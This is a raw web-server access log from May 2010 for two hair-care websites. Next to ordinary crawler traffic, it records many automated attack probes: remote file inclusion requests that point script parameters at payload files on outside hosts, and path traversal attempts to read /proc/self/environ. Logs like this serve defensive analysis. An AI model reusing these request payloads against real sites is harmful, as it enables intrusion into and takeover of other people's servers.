124.217.229.185 - - [03/May/2010:13:30:29 -0700] "GET /logs/access.log%20%20/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [03/May/2010:13:34:55 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.114.238 - - [03/May/2010:13:35:41 -0700] "GET /logs/access_091102.log HTTP/1.0" 200 696678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
213.231.15.150 - - [03/May/2010:13:36:42 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.freehairsecrets.com"
213.231.15.150 - - [03/May/2010:13:36:42 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Opera/7.11 (Windows NT 5.1; U) [en]" "growlonghairfast.com"
213.231.15.150 - - [03/May/2010:13:36:42 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.freehairsecrets.com"
213.231.15.150 - - [03/May/2010:13:36:42 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Opera/7.11 (Windows NT 5.1; U) [en]" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:13:37:13 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
119.235.237.92 - - [03/May/2010:13:40:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12296 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:13:41:14 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13685 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
122.199.140.158 - - [03/May/2010:13:46:24 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.199.140.158 - - [03/May/2010:13:46:24 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.199.140.158 - - [03/May/2010:13:46:31 -0700] "GET /logs/access_100412.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.115.1.7 - - [03/May/2010:13:47:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=949 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
122.199.140.158 - - [03/May/2010:13:56:22 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.199.140.158 - - [03/May/2010:13:56:33 -0700] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.199.140.158 - - [03/May/2010:13:56:36 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.199.140.158 - - [03/May/2010:13:57:43 -0700] "GET /Neos_Chronos/header.php?base_folder=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.199.140.158 - - [03/May/2010:13:57:43 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.199.140.158 - - [03/May/2010:13:57:43 -0700] "GET /logs/access_100208.log%20%20//Neos_Chronos/header.php?base_folder=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:13:58:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13388 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.195.114.238 - - [03/May/2010:13:59:45 -0700] "GET /logs/access_100104.log HTTP/1.0" 200 553567 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
122.199.140.158 - - [03/May/2010:14:01:34 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.199.140.158 - - [03/May/2010:14:01:36 -0700] "GET /logs/access_100125.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.199.140.158 - - [03/May/2010:14:01:44 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.199.140.158 - - [03/May/2010:14:03:13 -0700] "GET /logs/access_100419.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:14:06:26 -0700] "GET /logs/access_091026.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
115.68.20.197 - - [03/May/2010:14:07:54 -0700] "GET /logs/access_100426.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
115.68.20.197 - - [03/May/2010:14:08:00 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
115.68.20.197 - - [03/May/2010:14:08:11 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:14:11:27 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13040 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.195.114.238 - - [03/May/2010:14:12:53 -0700] "GET /logs/access_100118.log HTTP/1.0" 200 1274743 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
122.199.140.158 - - [03/May/2010:14:13:35 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.129.52.153 - - [03/May/2010:14:16:00 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
174.129.52.153 - - [03/May/2010:14:16:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17984 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
122.199.140.158 - - [03/May/2010:14:18:54 -0700] "GET /logs/access_100125.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:14:19:05 -0700] "GET /logs/access_100315.log%20%20///download.php?board_skin_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:14:19:05 -0700] "GET //download.php?board_skin_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:14:19:06 -0700] "GET /logs///download.php?board_skin_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:14:19:24 -0700] "GET //download.php?board_skin_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:14:19:24 -0700] "GET /logs///download.php?board_skin_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:14:19:24 -0700] "GET /logs/access_100315.log%20%20///download.php?board_skin_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:14:25:14 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
207.45.185.178 - - [03/May/2010:14:34:07 -0700] "GET /logs////bbs//skin/buzzard_espoon/setup.php?dir=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:14:34:07 -0700] "GET ///bbs//skin/buzzard_espoon/setup.php?dir=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:14:34:07 -0700] "GET /logs/access_100215.log////bbs//skin/buzzard_espoon/setup.php?dir=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
199.120.90.223 - - [03/May/2010:14:36:17 -0700] "GET /logs/access.log/?contenido=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
199.120.90.223 - - [03/May/2010:14:36:17 -0700] "GET /logs/access.log/?contenido=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
199.120.90.223 - - [03/May/2010:14:36:17 -0700] "GET /?contenido=http://geo.metodist.ru/images/id? HTTP/1.1" 200 926 "-" "libwww-perl/5.831" "www.freehairsecrets.com"
199.120.90.223 - - [03/May/2010:14:36:17 -0700] "GET /?contenido=http://geo.metodist.ru/images/id? HTTP/1.1" 200 926 "-" "libwww-perl/5.831" "www.freehairsecrets.com"
199.120.90.223 - - [03/May/2010:14:36:17 -0700] "GET /logs/?contenido=http://geo.metodist.ru/images/id? HTTP/1.1" 200 5085 "-" "libwww-perl/5.831" "www.freehairsecrets.com"
199.120.90.223 - - [03/May/2010:14:36:17 -0700] "GET /logs/?contenido=http://geo.metodist.ru/images/id? HTTP/1.1" 200 5085 "-" "libwww-perl/5.831" "www.freehairsecrets.com"
207.45.185.178 - - [03/May/2010:14:36:57 -0700] "GET /logs////bbs//skin/buzzard_espoon/setup.php?dir=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:14:36:57 -0700] "GET /logs/access_100215.log%20%20////bbs//skin/buzzard_espoon/setup.php?dir=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:14:36:57 -0700] "GET ///bbs//skin/buzzard_espoon/setup.php?dir=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:14:41:25 -0700] "GET /logs/access_100222.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:14:46:07 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
218.48.202.44 - - [03/May/2010:14:50:31 -0700] "GET /components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.48.202.44 - - [03/May/2010:14:50:31 -0700] "GET /logs//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.48.202.44 - - [03/May/2010:14:50:31 -0700] "GET /logs/access.log//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
115.68.20.197 - - [03/May/2010:14:53:37 -0700] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:14:54:03 -0700] "GET /logs/access_091207.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
89.108.121.202 - - [03/May/2010:14:55:29 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
89.108.121.202 - - [03/May/2010:14:56:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
89.108.121.202 - - [03/May/2010:14:56:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:15:04:25 -0700] "GET /logs/access_100322.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:15:11:19 -0700] "GET /logs/access_100104.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
89.108.121.202 - - [03/May/2010:15:12:13 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
89.108.121.202 - - [03/May/2010:15:12:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
89.108.121.202 - - [03/May/2010:15:12:14 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
89.108.121.202 - - [03/May/2010:15:12:17 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
89.108.121.202 - - [03/May/2010:15:12:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
89.108.121.202 - - [03/May/2010:15:12:18 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:15:14:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13072 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:15:26:12 -0700] "GET /logs/access_091109.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
88.250.216.231 - - [03/May/2010:15:32:59 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00" "growlonghairfast.com"
88.250.216.231 - - [03/May/2010:15:32:59 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00" "growlonghairfast.com"
67.195.112.151 - - [03/May/2010:15:34:57 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.112.151 - - [03/May/2010:15:34:57 -0700] "GET /?N=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
119.235.237.92 - - [03/May/2010:15:41:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17234 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
77.88.25.28 - - [03/May/2010:15:45:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13080 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:15:45:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13339 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
85.141.154.255 - - [03/May/2010:15:48:34 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://smartforexsignal.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "growlonghairfast.com"
85.141.154.255 - - [03/May/2010:15:48:34 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "growlonghairfast.com"
64.120.251.242 - - [03/May/2010:15:51:30 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "growlonghairfast.com"
64.120.251.242 - - [03/May/2010:15:51:30 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:15:59:52 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
151.1.253.1 - - [03/May/2010:16:01:19 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
151.1.253.1 - - [03/May/2010:16:01:19 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
151.1.253.1 - - [03/May/2010:16:01:19 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
99.39.2.249 - - [03/May/2010:16:07:21 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
211.172.232.251 - - [03/May/2010:16:08:03 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.172.232.251 - - [03/May/2010:16:08:03 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.172.232.251 - - [03/May/2010:16:08:03 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:16:12:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12887 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:16:12:46 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13559 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
67.195.112.151 - - [03/May/2010:16:18:35 -0700] "GET /?N=D HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:16:23:44 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15155 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
99.39.2.249 - - [03/May/2010:16:25:34 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
99.39.2.249 - - [03/May/2010:16:25:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
99.39.2.249 - - [03/May/2010:16:25:35 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.195.114.238 - - [03/May/2010:16:28:19 -0700] "GET /logs/access_100215.log HTTP/1.0" 200 3655063 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
202.69.230.122 - - [03/May/2010:16:31:44 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.69.230.122 - - [03/May/2010:16:31:44 -0700] "GET /logs/access_100426.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.69.230.122 - - [03/May/2010:16:31:44 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.69.230.122 - - [03/May/2010:16:31:48 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.114.22 - - [03/May/2010:16:33:53 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
67.195.114.22 - - [03/May/2010:16:33:53 -0700] "GET /logs/?N=D HTTP/1.0" 200 5069 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
77.88.25.28 - - [03/May/2010:16:35:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13153 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:16:38:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13358 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
212.95.63.241 - - [03/May/2010:16:41:39 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Opera/8.01 (Windows NT 5.1)" "growlonghairfast.com"
